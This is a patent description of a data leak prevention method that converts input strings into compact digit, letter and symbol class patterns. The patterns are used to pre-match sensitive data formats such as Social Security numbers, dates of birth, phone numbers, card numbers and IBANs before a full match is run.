Existing systems and methods for DLP generally use pattern matching for identifying sensitive data, and then attempt to prevent its leakage. As there may be thousands of such patterns for different data sets/types, pattern matching and identification of sensitive data can be time consuming, and hence can make transactions slow. Generally, input strings and data patterns to be matched are represented as regular expressions, the processing of which is computationally expensive and can lead to slow performance. Pattern matching for identification of sensitive data becomes more difficult for data types such as Social Security Numbers, Credit Card Numbers, Dates of Birth, telephone numbers, vehicle registration numbers, among others, which may have standard patterns but also have complex requirements for different positions within data streams/strings, for example, and hence require the creation and use of several regular expressions. For example, as of 2011, non-customized California vehicle registration plates use a seven character alphanumeric serial format having an integer value of 0-9 followed by three capital letters and ending with three integer values of 0-9. While a simple regular expression can be defined to identify such a pattern, other states have different serial formats and the serial formats have changed over the years. As such, those skilled in the art will appreciate a large number of regular expressions would be required to identify all possible serial formats used by every state over the years. Meanwhile, due to the complexity, such data types cannot be processed in parallel like other regular pattern matching implementations.



There is therefore a need for improved, high performance pattern matching that is capable of efficiently detecting sensitive data while in use (e.g., endpoint actions), in motion (e.g., network traffic) and/or at-rest (e.g., data storage) to prevent data leakage.

## SUMMARY

Systems and methods are described for data leak detection and prevention. An input string is received by a Data Leak Prevention (DLP) system. The input string is converted by the DLP system into a fixed string pattern. The conversion is performed based on one or more of multiple class definitions, including a digit class, a letter class and a symbol class. A determination is then made by the DLP system regarding whether the input string contains potential sensitive data to which a full-match is to be applied by matching the fixed string pattern against one or more stored target strings representative of sensitive data.

Other features of embodiments of the present disclosure will be apparent from accompanying drawings and from detailed description that follows.

## BRIEF DESCRIPTION OF THE DRAWINGS

In the Figures, similar components and/or features may have the same reference label. Further, various components of the same type may be distinguished by following the reference label with a second label that distinguishes among the similar components. If only the first reference label is used in the specification, the description is applicable to any one of the similar components having the same first reference label irrespective of the second reference label.

FIG. **1**A illustrates an exemplary network architecture showing configuration of a DLP agent in accordance with an embodiment of the present invention.

FIG. **1**B illustrates another exemplary network architecture showing configuration of host and network based DLP modules in accordance with an embodiment of the present invention.

FIG. **2** illustrates exemplary functional modules of a fixed string pattern based matching system in accordance with an embodiment of the present invention.

FIG. **3** illustrates an example showing conversion of an input string to a fixed string pattern in accordance with an embodiment of the present invention.

FIG. **4** illustrates another example showing conversion of an input string to a fixed string pattern in accordance with an embodiment of the present invention.

FIG. **5** is a flow diagram illustrating a DLP process in accordance with an embodiment of the present invention.

FIGS. **6**A and **6**B are flow diagrams illustrating a DLP process for generation of a fixed pattern string from an input string in accordance with an embodiment of the present invention.

FIG. **7** is an exemplary computer system in which or with which embodiments of the present invention may be utilized.

## DETAILED DESCRIPTION

Systems and methods are described for data leak detection and prevention. In the following description, numerous specific details are set forth in order to provide a thorough understanding of embodiments of the present disclosure. It will be apparent to one skilled in the art that embodiments of the present disclosure may be practiced without some of these specific details.

Embodiments of the present disclosure include various steps, which will be described below. The steps may be performed by hardware components or may be embodied in machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with the instructions to perform the steps. Alternatively, steps may be performed by a combination of hardware, software, firmware and/or by human operators.

Embodiments of the present disclosure may be provided as a computer program product, which may include a machine-readable storage medium tangibly embodying thereon instructions, which may be used to program a computer (or other electronic devices) to perform a process. The machine-readable medium may include, but is not limited to, fixed (hard) drives, magnetic tape, floppy diskettes, optical disks, compact disc read-only memories (CD-ROMs), and magneto-optical disks, semiconductor memories, such as ROMs, PROMs, random access memories (RAMs), programmable read-only memories (PROMs), erasable PROMs (EPROMs), electrically erasable PROMs (EEPROMs), flash memory, magnetic or optical cards, or other type of media/machine-readable medium suitable for storing electronic instructions (e.g., computer programming code, such as software or firmware).

Various methods described herein may be practiced by combining one or more machine-readable storage media containing the code according to the present disclosure with appropriate standard computer hardware to execute the code contained therein. An apparatus for practicing various embodiments of the present disclosure may involve one or more computers (or one or more processors within a single computer) and storage systems containing or having network access to computer program(s) coded in accordance with various methods described herein, and the method steps of the disclosure could be accomplished by modules, routines, subroutines, or subparts of a computer program product.

If the specification states a component or feature "may", "can", "could", or "might" be included or have a characteristic, that particular component or feature is not required to be included or have the characteristic.

Although the present disclosure has been described with the purpose of conducting network auditing, it should be appreciated that the same has been done merely to illustrate the disclosure in an exemplary manner and any other purpose or function for which the explained structure or configuration can be used, is covered within the scope of the present disclosure.

Exemplary embodiments will now be described more fully hereinafter with reference to the accompanying drawings, in which exemplary embodiments are shown. This disclosure may, however, be embodied in many different forms and should not be construed as limited to the embodiments set forth herein. These embodiments are provided so that this disclosure will be thorough and complete and will fully convey the scope of the disclosure to those of ordinary skill in the art. Moreover, all statements herein reciting embodiments of the disclosure, as well as specific examples thereof, are intended to encompass both structural and functional equivalents thereof. Additionally, it is intended that such equivalents include both currently known equivalents as well as equivalents developed in the future (i.e., any elements developed that perform the same function, regardless of structure).



Thus, for example, it will be appreciated by those of ordinary skill in the art that the diagrams, schematics, illustrations, and the like represent conceptual views or processes illustrating systems and methods embodying this disclosure. The functions of the various elements shown in the figures may be provided through the use of dedicated hardware as well as hardware capable of executing associated software. Similarly, any switches shown in the figures are conceptual only. Their function may be carried out through the operation of program logic, through dedicated logic, through the interaction of program control and dedicated logic, or even manually, the particular technique being selectable by the entity implementing this disclosure. Those of ordinary skill in the art further understand that the exemplary hardware, software, processes, methods, and/or operating systems described herein are for illustrative purposes and, thus, are not intended to be limited to any particular named embodiment/implementation.

Embodiments of the present invention generally relate to data leakage detection and prevention. In particular, embodiments of the present invention relate to high performance pattern matching for data leakage detection and prevention. Systems and methods are also described for preprocessing data to facilitate DLP pattern matching.

In accordance with one embodiment, a DLP system includes one or more processors and a memory. The memory contains therein an input string receive module that is configured to receive an input string and a fixed string pattern based conversion module that is configured to convert the input string into a fixed string pattern. The conversion is performed based on multiple class definitions, including a digit class, a letter class and a symbol class. The DLP system can further include a pre-match implementation module that is configured to enable simultaneous matching between the fixed string pattern and one or more stored target strings that are representative of sensitive data in order to determine whether the input string contains potential sensitive data to which a full-match is to be applied. The existence of potentially sensitive data can then be determined when the fixed string pattern matches one of the stored target strings.

In an aspect, the fixed string pattern can be formed by, for each character position within the input string, identifying a matching class of the multiple of classes for a character at the character position within the input string, and then replacing the character at the character position within the input string with a single character associated with the matching class followed by an integer value indicative of consecutive matches to the matching class.

In another aspect, the fixed string pattern can be formed by, for each character position within the input string, identifying a matching class of the multiple of classes for a character at the character position within the input string, replacing the character at the character position within the input string with a current replacement character of a plu-

rality of characters associated with the matching class, and setting the current replacement character to a next character of the plurality of characters.

In an aspect, the letter class can include an upper case letter subclass and a lower case letter subclass. In another aspect, the symbol class can include a supported symbol subclass and an unsupported symbol subclass. In another aspect, multiple fixed string patterns of multiple corresponding input strings can be processed in parallel against the one or more stored target strings. In an aspect, the fixed string pattern based conversion module can further be configured to detect any of integer overflows or long word overflows while converting the input string to the fixed string pattern.

In yet another aspect, the matching can be conducted based on any or a combination of deterministic finite automaton algorithms, including, but not limited to, Morris-Pratt algorithm, Brute Force algorithm, Karp-Rabin algorithm, Shift Or algorithm, Knuth-Morris-Pratt algorithm, Simon algorithm, Colussi algorithm, Galil-Giancarlo algorithm, Apostolico-Crochemore algorithm, Not So Naive algorithm, Boyer-Moore algorithm, Turbo BM algorithm, Apostolico-Giancarlo algorithm, Reverse Colussi algorithm, Horspool algorithm, Quick Search algorithm, Tuned Boyer-Moore algorithm, Zhu-Takaoka algorithm, Berry-Ravindran algorithm, Smith algorithm, Raita algorithm, Reverse Factor algorithm, Turbo Reverse Factor algorithm, Forward Dawg Matching algorithm, Backward Nondeterministic Dawg Matching algorithm, Backward Oracle Matching algorithm, Galil-Seiferas algorithm, Two Way algorithm, String Matching on Ordered Alphabets algorithm, Optimal Mismatch algorithm, Maximal Shift algorithm, Skip Search algorithm, KMP Skip Search algorithm, and Alpha Skip Search algorithm.

FIG. **1A** illustrates an exemplary network architecture **100** showing configuration of a DLP agent (e.g., DLP agent **110-1**, **110-2** or **110-3**) in accordance with an embodiment of the present invention. According to one embodiment, a DLP system may be implemented as a standalone system communicably coupled with or integrated within one or more other network devices to monitor and prevent data leakage from the monitored network device(s). In alternative embodiments, a DLP system may be implemented within a typical client computing device or within a network device, including, but not limited to a firewall, a gateway, a router, or any other network device or network security device. As shown in FIG. **1A**, DLP agents **110-1**, **110-2** and **110-3** may be implemented within client computing system **102-1**, client computing system **102-2**, and client computing system **102-3**, respectively, which may also be referred to collectively and interchangeably as client device(s) **102** hereinafter. In the context of the present example, in addition to regular applications **104**, client computing system **102-1** can include DLP agent **110-1** having a corresponding DLP policy **112**. In addition, client computing system **102-1** can include one or more external device interface(s) **106** and network interface(s) **108**. In an exemplary implementation, each client device **102-1**, **102-2** and **102-3** within a network **116** (e.g., an enterprise network) can include a local DLP agent (e.g., DLP agent **110-1**, **110-2** and **110-3**, respectively, which may be collectively and interchangeably referred to as DLP agent(s) **110** hereinafter.

In some embodiments, DLP agents **110** may also or alternatively be incorporated within network devices, such as network device **118**. In an embodiment, exemplary network architecture **100** can include a server computing system **120**, which can be configured to retrieve data from a network shared storage drive **122**. In an aspect, communication from server **120** can be monitored continuously or at periodic intervals in order to detect and prevent data leakage from server **120**, wherein detection and prevention of data leakage from server computing system **120** can be important as a result of server **120** generally having access to a large amount of sensitive data stored in network shared storage drive **122**, for example.

Depending upon the particular implementation, data leakage can be detected and/or prevented at different levels of network architecture **100**. For instance, data leakage from server computing device **120**, individual client devices **102** and/or at a particular network device (e.g., network device **118**) can be detected and/or prevented using a DLP system, such as that described herein, which facilitates efficient DLP pattern matching.

In an exemplary implementation, a typical client device (e.g., client device **102-1**) may have different applications **104** (e.g., a web browser, Java script based applications, Email client applications, interactive messaging clients, File Transfer Protocol (FTP) clients, among others) that can be used by a user of the client device to intentionally or unintentionally send sensitive data from the client device to an unauthorized user and/or device within network **116** or outside of network **116**. DLP agent **110-1** implemented within client device **102-1** can be configured to monitor and prevent leakage of known types of sensitive data from client device **102-1**. In an exemplary implementation, DLP agent **110-1** can be configured to monitor and prevent transfer of sensitive data via network interface **108**. In another exemplary implementation, DLP agent **110-1** can be configured to monitor and prevent transfer of sensitive data through external device interface **106** (e.g., a Universal Serial Bus (USB) interface, microSD interface, CD drive or the like).

In different implementations, data stored on local data storage **114** can be marked as sensitive in a manner such that when such sensitive data is retrieved from storage **114**, DLP agent **110-1** can start monitoring the flow of data between different applications, and prevent leakage of the data before it crosses a predefined boundary. In an exemplary implementation, the flow of sensitive data can be restricted with a user-defined or system-defined dynamically generated boundary. For instance, for particular data, the boundary for unfettered access can be access of secured data by an authorized user only through a particular application such that if the same data is accessed by another application, DLP agent **110-1** can block such access of the secured data.

In an exemplary implementation, DLP agent **110-1** can be configured to monitor and prevent even printouts of sensitive data. The DLP agent **110-1** can initiate data monitoring and prevention responsive to observing a command/instruction issued by client computing system **102-1** to local data store **114**, for example. In an exemplary implementation, DLP agents **110** can be integrated with particular applications **104** running on client device **102** such that communication/data transfer from client device **102** using applications **104** can be monitored to detect and prevent data leakage.

In an aspect of the present invention, DLP agents **110** can be configured to receive data strings from different sources to determine the presence of sensitive and/or protected data in such received input/data strings, and prevent transfer of protected data/strings if sensitive data is detected therein. In an exemplary implementation, an input string can be received at run-time from a pool of data at network interface **108**, or can be received from application **104** or from any other external interface **106**/source. In an exemplary implementation, the received data string (e.g., from a file (e.g., a

Microsoft Word file, a Microsoft Excel file, a PDF file, a text file, etc.), from the contents of an email message, from the contents of a Hypertext Transfer Protocol (HTTP) request or response, from the contents of the address or search bar of a web browser or the like) can be converted into a fixed string pattern based on an appropriate class definition selected from multiple class definitions as a preprocessing step before performing comparisons to potential sensitive fixed data DLP patterns. In an aspect, class definitions can include but are not limited to a digit class, a letter class and a symbol class. Once the data strings to be scanned for potential sensitive information have been converted into fixed string patterns, the fixed string patterns can be compared with known patterns having secured data types. For instance, DLP agent **110** can be configured to detect potential leakage of an account number, a credit card number, a social security number, a date of birth, etc. In an exemplary implementation, as described in further detail below, any type of sensitive data that can be represented in the form of one or more regular expressions can be converted to one or more corresponding fixed patterns for more efficient detection by DLP agent **110**. Those skilled in the art will appreciate that data having a fixed pattern (e.g., "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" or "0123456789" or "012 01 0123") is computationally less expensive to match than a regular expression (e.g., a regular expression defining a social security number as "([ˆ0-9-]|ˆ([0-9]{3}-[0-9]{2}-[0-9]{4}(ˆ0-9-]|$)").

In an exemplary implementation, DLP agent **110** can include a database and/or a list of stored target strings (e.g., sensitive fixed data DLP patterns of concern to the enterprise) that may be representative of sensitive data. After converting an input data string into a fixed string pattern, DLP agent **110** can compare the converted fixed string pattern with each stored target string of the list of stored target strings. In an exemplary implementation, any existing string matching algorithm can be used for comparing converted fixed string pattern with the stored target strings/patterns. In an exemplary implementation, if the converted fixed string pattern matches with the stored target pattern, DLP agent **110** can flag the transfer attempt. In an exemplary implementation, based on one or more policy rules, DLP agent **110** can take appropriate actions on the input string. Exemplary actions that can be taken on an input string upon detection of a transfer attempt, for example, containing sensitive data, include, but are not limited to, blocking/deleting the particular transaction/string, raising an alarm, sending information on the string/sender/sending computing device to an administrator, or restricting any further action by the user on his/her respective client device **102**, or restricting any further user action on the protected network.

FIG. **1B** illustrates another exemplary network architecture **150** showing configuration of host and network based DLP modules in accordance with an embodiment of the present invention. As shown in FIG. **1B**, a network **152** can include several workstations such as workstation **154-1** and workstation **154-2**, and a server **158**, and can further include a gateway **160** that is configured to allow data communication with one or more external networks (e.g., external network(s) **164**). In an exemplary embodiment, gateway **160** can include a network-based DLP module **162** that can be configured to detect and prevent data leakage from devices within network **152**. In an exemplary implementation, network-based DLP module **162** can be implemented within a network security device (e.g., gateway **160**, a firewall (not shown), an intrusion prevention system (IPS) (not shown) or other network security devices that are capable of monitoring data flow within or through network **152**. In an exemplary implementation, network-based DLP module **162** can be configured to detect sensitive data contained within an electronic communication (e.g., a file transfer, an email message, an instant message or the like). In an exemplary implementation, network-based DLP module **162** can be configured to scan network traffic as it is attempted to be passed through gateway **160** in order to detect the presence of sensitive data. As described in further detail below, DLP module **162** can be configured to create a copy of data attempted to be passed through gateway **160** by converting data contained within the network traffic from its original form into a set of fixed string patterns. Then, the fixed string patterns can be efficiently compared with the stored target strings/patterns, which may representative of sensitive data to confirm the presence or absence of sensitive data in the network traffic at issue.

In an exemplary implementation, a host-based DLP module such as host-based DLP module **156-1**, host-based DLP module **156-2**, host-based DLP module **156-3**, which may be collectively and interchangeably referred to as host-based DLP module(s) **156** hereinafter, can respectively be implemented within workstation **154-1**, workstation **154-2** and server **158**. In an exemplary implementation, each host-based DLP module **156** may have a different set of stored target strings depending on the kind of data that needs to be prevented from being leaked from the particular computing device. In an exemplary implementation, stored target strings can represent patterns of the sensitive data that can be configured manually by a user and/or an administrator of the computing device or network. In another exemplary implementation, stored target strings can be dynamically updated from a centralized location by an administrator of network **152**.

In different applications, host-based DLP module **156** can be configured to detect leakage of sensitive data at an application or presentation level, while the network-based DLP module **162** can be configured to detect leakage of sensitive data at layer 2 or layer 3 of the OSI layers. In an exemplary implementation, DLP modules, such as host-based DLP module **156** and network-based DLP module **162** can be configured to have substantially the same or different functionality.

FIG. **2** illustrates exemplary functional modules of fixed string pattern based matching system **200** in accordance with an embodiment of the present invention. As shown in FIG. **2**, fixed string pattern based matching system **200** can include an input string receive module **202** that can be configured to receive an input string, a fixed string pattern based conversion module **204** that can be configured to convert the input string into a fixed string pattern, a pre-match implementation module **206** that can be configured to enable parallel matching of the fixed string pattern with one or more patterns of stored target strings, and a full-match implementation module **208** that can be configured to match the input string with one or more stored target strings when the fixed string pattern matches one of the patterns of the stored target strings.

In an example implementation, input string receive module **202** can include a parser and/or a syntax analyzer for splitting the communication traffic into one or more logical input strings. The input string receive module **202** can be configured to receive the input strings from a network interface and/or from an external device interface and/or from any other data transfer ports such as USB port, DVD writer, microSD port, among other devices, such as network devices, including, but not limited to firewalls or gateway devices. In an exemplary implementation, input string

receive module **202** can be configured to receive communication data and parse the communication into different input strings for further analysis. In an exemplary implementation, different input strings can be further be processed in parallel by any or a combination of fixed string pattern based conversion module **204**, pre-match implementation module **206**, and full-match implementation module **208**.

In an aspect, fixed string pattern based conversion module **204** can be configured to convert/translate the input strings into fixed string patterns based on different class definitions, which can include a character class definition such as digit class, letter class, and a symbol class. In an exemplary implementation, an input string can be converted into a corresponding fixed string pattern by identifying a matching class from the class definitions. In an exemplary implementation, an input string can be converted into a fixed string pattern by scanning a first character of the input string and representing that character with the initial value of the relevant class and then counting the number of subsequent characters in that class until a character of a different input class is encountered in the input string. The input string can therefore be represented by replacing its first character by its character class followed by an integer value that is indicative of number of times the same character class is repeated in the input string, after which the first character encountered that is associated a different character class is replaced by the its corresponding character class and so on. For instance, if an input string is 01-02-1986, the corresponding fixed string pattern can be D2-D2-D4, wherein the character class is digit (D), and on finding the match with the character class, the input string is represented by the representative symbol D and then the consecutive matches are counted until a non-digit character "-" is detected in the string. In an exemplary implementation, a special character can be presented with the appropriate symbol, or can be represented as mere substitution of the same character of input string in the converted fixed string pattern. For example, the character "-" can be represented as "-" or by any other defined symbol class representation in the character class definition.

In an exemplary implementation, fixed string pattern based conversion module **204** can be configured to form a fixed string pattern by scanning each character of the input string and identifying a matching class of multiple defined character classes for the character at the current character position within the input string, and replacing/representing the character at the current character position within the input string with a single character associated with the matching class followed by an integer value indicative of consecutive matches to the identified matching classes.

In an exemplary implementation, the character class definitions can include different character classes that may further include predefined character class functions, which can scan an input string and convert the string into a standard/defined format/pattern. In an exemplary implementation, the character class definition used by fixed string pattern based conversion module **204** can include, but is not limited to, a digit class (represented as D), a letter class (represented as C), and a symbol class (represented as S), wherein the digit class D can include a definition that converts an input string by identifying whether the character of the scanned position at the input string is a digit, and then counting the number of characters that are digits (0-9) unless the character at the scanned position is a character of different class. In an embodiment, letter class function/definition can include specific classes such as lower case letter sub-class (represented as L, for instance) for representing input string(s) that contain lower case characters [a-z], and upper case letter sub-class (represented as U, for instance) for representing input string(s) that contain upper case characters [A-Z]. In another embodiment, symbol class function/definition can include sub-classes such as support symbols sub-class and an unsupported sub-class. For example, an example input string "89456" can be represented as D5 using the digit class definition. Similarly, the input string "NAME" can be represented as C4 using the letter class definition/function. In another exemplary implementation, an input string containing special characters can be represented in similar manner using the symbol class function. For instance, "SSN: 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" can be converted into "U3: D3-D2-D4", "Birthday: 12/18/1988" can be converted into "UL7: D2/D2/D4", "Tel: (408)888-9999" can be converted into "UL2: (D3)D3-D4", "California vehicle registration plates: 6SAM888" can be converted into "UL9 L7 K12 L6: DU3D3", "American Express: 4444-666666-55555" can be converted into "UL7: D4-D6-D5", and "International Bank Account Number: GB29 NWBK 6016 1331 9268 19" can be converted into "UL11 UL3 UL6 UL5: U2D2 U4 D4 D4 D4 D2".

In an aspect, symbol class can include other defines characters/representation such as for instance, {all other chars}, including white spaces, special characters, which can be 194 in total in an embodiment.

In an aspect, fixed string pattern based conversion module **204** can be configured to detect any of integer overflows or long word overflows while converting the input string to the fixed string pattern.

In another exemplary implementation, fixed string pattern based conversion module **204** can be configured to form a fixed string by scanning each character of the input string, identifying a matching class of the defined classes for a character at the character position within the input string, replacing the character at the character position within the input string with a current replacement character of multiple replacement characters associated with the matching class, and setting the current replacement character to the next character in sequence of the plurality of representative character of character class. For instance, a conversion function on D can be defined based on its consecutive count within the D class. The first digit can be converted to 0 (the first element in D), the second consecutive digit within the input string can be converted to 1. Furthermore, the conversion can be defined cyclically if more than 10 consecutive digits occur in an input string, for instance, the 25th consecutive digit can be converted to 4. Similarly, a conversion function on U (or L), the first upper (or lower) case letter can be defined in order to convert them to first letter 'A' (or 'a'), and so on. In another embodiment, no conversions can be performed on symbol class function S, that is, each character in class S is unchanged. Those skilled in the art will appreciate that this is only an exemplary illustration and one implementation for how the conversion can be performed. Other character class definitions are completely within the scope of the present disclosure. Following the above-mentioned definition, an input stream "SSN: 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" can be converted into "ABC: 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", "Birthday: 12/18/1988" can be converted into "Aabcdefg: 01/01/0123", "Tel: (408)888-9999" can be converted into "Aab: (012)012-0123", "California vehicle registration plates: 6SAM888" can be converted into "Aabcdefghi abcdefg abcdefghijkl abcdef: 0ABC012", "American Express: 4444-666666-55555" can be converted into "Aabcdefg Aabcdef: 0123-012345-01234", and "International Bank Account

Number: GB29 NWBK 6016 1331 9268 19" can be converted into "Aabcdefghijk Aabc Aabcdef Aabcde: AB01 ABCD 0123 0123 0123 01".

In an aspect, after conversion of the input string into a corresponding fixed pattern string, the fixed pattern string can be matched with one or more target string patterns to identify the presence of sensitive data within the communication that the input string forms part of. Pre-match implementation module **206** can be configured to match the fixed pattern string with one or more stored target string patterns. Those of ordinary skill in the art will appreciate that the pre-match implementation module **206** can have a list and/or a database of stored string patterns that can be representative of sensitive data and such a list/database/repository may have been generated based on similar character class functions/definitions. In an exemplary implementation, pre-match implementation module **206** can be configured to match a fixed pattern string with one or more stored target string patterns in parallel or in sequence. It is also possible to run multiple instances of the pre-match implementation module **206** to match different fixed pattern strings with the one or more of stored target string patterns in parallel.

In an aspect, a match of a fixed string pattern with at least one stored target string pattern by the pre-match implementation module **206** can be indicative of a potential sensitive data leak. In an exemplary implementation, pre-match implementation module **206** can be configured to incorporate an appropriate action based on one or more predefined policy rules. In another exemplary implementation, pre-match implementation module **206** can be configured to initiate a full-match implementation module **208** that can be configured to match the input string with the stored target string. In another implementation, pre-match implementation module **206** can be configured to take an appropriate action such as blocking the communication that contains the input string for which the fixed string pattern matches with at least one stored target string pattern. Similarly, pre-match implementation module **206** can take another appropriate action such as reporting of the detected leak to an administrator or to an actual owner of the sensitive data. In another exemplary implementation, one or more actions can be taken by the pre-match implementation module **206** based on one or more predefined or dynamically changing DLP policies or rules.

In an exemplary implementation that involves representation of a string by a character followed by the number of times the character class is repeated, as illustrated above, a SSN can be matched with one or more of "D3-D2-D4", "D9" and "D3 D2 D4"; DOB can be matched with one or more of "D2/D2/D4" and "D2-D2-D4"; Tel. No. can be matched with one or more of "(D3)D3-D4", "D3-D3-D4" and "D3.D3.D4"; California VR Plate can be matched with "DU3D3", American Express card can be matched with one or more of "D4-D6-D5", "D15" and "D4 D6 D5" and MAN can be matched with "U2D2 U4 D4 D4 D4 D2".

In an exemplary implementation that involves representation of a string by a character followed by the number of times the character class is repeated and representation of symbols with S followed by the number of times the symbol class is repeated, as illustrated above, a SSN can be matched with one or more of "D3SD2SD4", "D9" and "D3 D2 D4"; DOB can be matched with "D2SD2SD4"; Tel. No. can be matched with one or more of "SD3SD3SD4" and "D3SD3SD4".

In another exemplary implementation that involves representation of a first character followed by sequentially increasing numbers, above-illustrated SSN can be matched with following stored pattern "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" to confirm if a SSN number is being communicated. Similarly, DOB can be matched with one or more of "01/01/0123" and "01-01-0123"; Tel. No. can be matched with one or more of "(012)012-0123", "012-012-0123" and "012.012.0123"; California VRP can be matched with "0ABC012", American Express card can be matched with "0123-012345-01234", and IBAN can be matched with "AB01 ABCD 0123 0123 0123 01". In an aspect, such a conversion can be applied to DLP patterns that support most digit related numbers or formats. It is also possible to pre-match DLP patterns simultaneously. In another aspect/embodiment of the present disclosure, cycle (period) can be set smaller (say 8 instead of 10 or 26) to simplify hardware logic or to reduce hardware cost. That is, instead of running from, for letter class, A-Z, the run can be from A-H to then come back to A, and similarly, for digit class, instead of running from 0-9, the run can be from 0-7 and then back to 0. In an exemplary implementation, an IP address can also be pre-matched by "(0|1|2)\.0(|1|12)\.0(|1|12)\.0" (27 alternation patterns), wherein 32-bit integer overflow can be pre-matched with "01234567890" or shorter string "7890".

In an aspect, for efficient and fast matching of an input string pattern with stored target string patterns, pre-match implementation module **206** can use one or combination of deterministic finite automaton algorithm, Morris-Pratt algorithm, Brute Force algorithm, Karp-Rabin algorithm, Shift Or algorithm, Knuth-Morris-Pratt algorithm, Simon algorithm, Colussi algorithm, Galil-Giancarlo algorithm, Apostolico-Crochemore algorithm, Not So Naive algorithm, Boyer-Moore algorithm, Turbo BM algorithm, Apostolico-Giancarlo algorithm, Reverse Colussi algorithm, Horspool algorithm, Quick Search algorithm, Tuned Boyer-Moore algorithm, Zhu-Takaoka algorithm, Berry-Ravindran algorithm, Smith algorithm, Raita algorithm, Reverse Factor algorithm, Turbo Reverse Factor algorithm, Forward Dawg Matching algorithm, Backward Nondeterministic Dawg Matching algorithm, Backward Oracle Matching algorithm, Galil-Seiferas algorithm, Two Way algorithm, String Matching on Ordered Alphabets algorithm, Optimal Mismatch algorithm, Maximal Shift algorithm, Skip Search algorithm, KMP Skip Search algorithm, and Alpha Skip Search algorithm.

In an aspect, one exemplary DLP policy may require a full match of input string with the stored target string(s) in order to confirm presence of sensitive data before taking any further action. For example, a policy rule may require protection of sensitive data where the PAN (personal account number) is needed to be matched with specific PAN of a particular user. In an exemplary implementation, pre-match implementation module **206** can be configured to enable simultaneous matching between the fixed string pattern and one or more stored target strings that are representative of sensitive data in order to determine whether the input string contains potential sensitive data to which a full-match is to be applied using the full-match implementation module **208**.

In an aspect, full-match implementation module **208** can be configured to match an input string with stored target string(s), and not only the pattern of input string with the pattern of stored target string, but instead conducting a full match. Full-match implementation module **208** can be used to confirm presence of a specific/particular string, wherein the pre-match implementation module **206** can match the pattern of the input string with the pattern of target strings to identify potential indication of presence of sensitive data. In an exemplary implementation, full-match implementation

module **208** can also be configured to perform one or more matches of one or more input string with one or more stored target strings.

For efficient and fast matching of input string with stored target strings, full-match implementation module **208** can use one or combination of deterministic finite automaton algorithm, Morris-Pratt algorithm, Brute Force algorithm, Karp-Rabin algorithm, Shift Or algorithm, Knuth-Morris-Pratt algorithm, Simon algorithm, Colussi algorithm, Galil-Giancarlo algorithm, Apostolico-Crochemore algorithm, Not So Naive algorithm, Boyer-Moore algorithm, Turbo BM algorithm, Apostolico-Giancarlo algorithm, Reverse Colussi algorithm, Horspool algorithm, Quick Search algorithm, Tuned Boyer-Moore algorithm, Zhu-Takaoka algorithm, Berry-Ravindran algorithm, Smith algorithm, Raita algorithm, Reverse Factor algorithm, Turbo Reverse Factor algorithm, Forward Dawg Matching algorithm, Backward Nondeterministic Dawg Matching algorithm, Backward Oracle Matching algorithm, Galil-Seiferas algorithm, Two Way algorithm, String Matching on Ordered Alphabets algorithm, Optimal Mismatch algorithm, Maximal Shift algorithm, Skip Search algorithm, KMP Skip Search algorithm, and Alpha Skip Search algorithm.

In an aspect, due to the proposed conversation of an input string into a fixed pattern string, converted data can be compressed in a natural way, wherein pre-match patterns are easier for understanding and writing, and have lower false-alarms as they contain more ending information. In an aspect, as mentioned above, symbol class can be divided into two sub-classes, one called supported symbols S, and the other called unsupported Symbols X, wherein conversions on unsupported symbols can be done with consecutive count output similar to classes D, U or L. For instance, S={all non-alphanumeric symbols between 0x00-0x127}, and X={all symbols between 0x80-0xff}, wherein a stream "\x80\x81\x82\x83 x84_\x85\x86\x88 test 12345" can be converted to: "X4 X_X3 L4 D5".

In an aspect, a standard Deterministic Finite Automata (DFA) algorithm can be applied on the streams after the above conversions, as a result of which the DFA memory size can significantly be reduced. It is also possible to incorporate/utilize bloom filters and hash tables for detecting and/or filtering DLP patterns in parallel. In yet another aspect, Integer overflows and/or long word overflows can be detected using this implementation also. In yet another aspect, U and L can be merged into one class W if case-sensitivity does not impact the string conversion/matching.

FIG. **3** illustrates an example **300** showing conversion of an input string **302** to a fixed string pattern **306** in accordance with an embodiment of the present invention. As shown in FIG. **3** and also illustrated above, an input string such as **302-1** SSN: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 can be processed with respect to one or more predefined common class based functions **304** to be converted into corresponding fixed pattern string ABC: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, and similarly other strings **302-2** to **302-6**, for instance, can be converted into corresponding fixed pattern strings, which can then be matched with corresponding stored/pre-defined target pattern strings such as SSN string can be matched with a pattern "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" to confirm if the input string includes an SSN identifier.

FIG. **4** illustrates another example **400** showing conversion of an input string **402** to a fixed string pattern **406** in accordance with an embodiment of the present invention. As shown in FIG. **4** and also illustrated above, input string such as **402-1** SSN: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 can be processed with respect to one or more class definition and consecutive count based



functions **404** to be converted into corresponding fixed pattern string U3:D3-D2-D4, and similarly other strings **402-2** to **402-6**, for instance, can be converted into corresponding fixed pattern strings, which can then be matched at **410** with corresponding stored/pre-defined target pattern strings (stored, for instance, in a pattern database **408**) such as SSN string can be matched with a pattern "U3:D3-D2-D4" to confirm if the input string include an SSN identifier.

FIG. **5** is a flow diagram **500** illustrating a DLP process in accordance with an embodiment of the present invention. At step **502**, the method can include receiving, at a data leak prevention (DLP) system, an input string, and at step **504**, the method can include the step of converting, by the DLP system, the input string into a fixed string pattern based on a plurality of class definitions including a digit class, a letter class and a symbol class. At step **506**, the method can further include the step of determining, by the DLP system, whether the input string includes potential sensitive data to which a full-match can be applied by matching the fixed string pattern against one or more stored target strings that are representative of sensitive data.

FIGS. **6**A and **6**B are flow diagrams **600** and **650** illustrating a DLP process for generation of a fixed pattern string from an input string in accordance with an embodiment of the present invention. At step **602**, the method can include receiving, at a data leak prevention (DLP) system, an input string, and at step **604**, the method can include, for each character position within the input string, identifying a matching class for a character at the character position within the input string. The method can further include, at step **606**, replacing the character at the character position within the input string with a single character associated with the matching class followed by an integer value indicative of consecutive matches to the matching class. With respect to FIG. **6**B, at step **602**, the method can include receiving, at a data leak prevention (DLP) system, an input string, and at step **654**, for each character position within the input string, identifying a matching class for a character at the character position within the input string. At step **656**, the method can include the step of replacing the character at the character position within the input string with a current replacement character of a plurality of characters associated with the matching class, and at step **658**, setting the current replacement character to a next character of the plurality of characters.

FIG. **7** is an example of a computer system **700** with which embodiments of the present disclosure may be utilized. Computer system **700** may represent or form a part of a network security device (e.g., a gateway, a firewall or an IPS), a network appliance, a server, a client workstation or other device implementing DLP.

Embodiments of the present disclosure include various steps, which have been described above. A variety of these steps may be performed by hardware components or may be tangibly embodied on a computer-readable storage medium in the form of machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with instructions to perform these steps. Alternatively, the steps may be performed by a combination of hardware, software, and/or firmware.

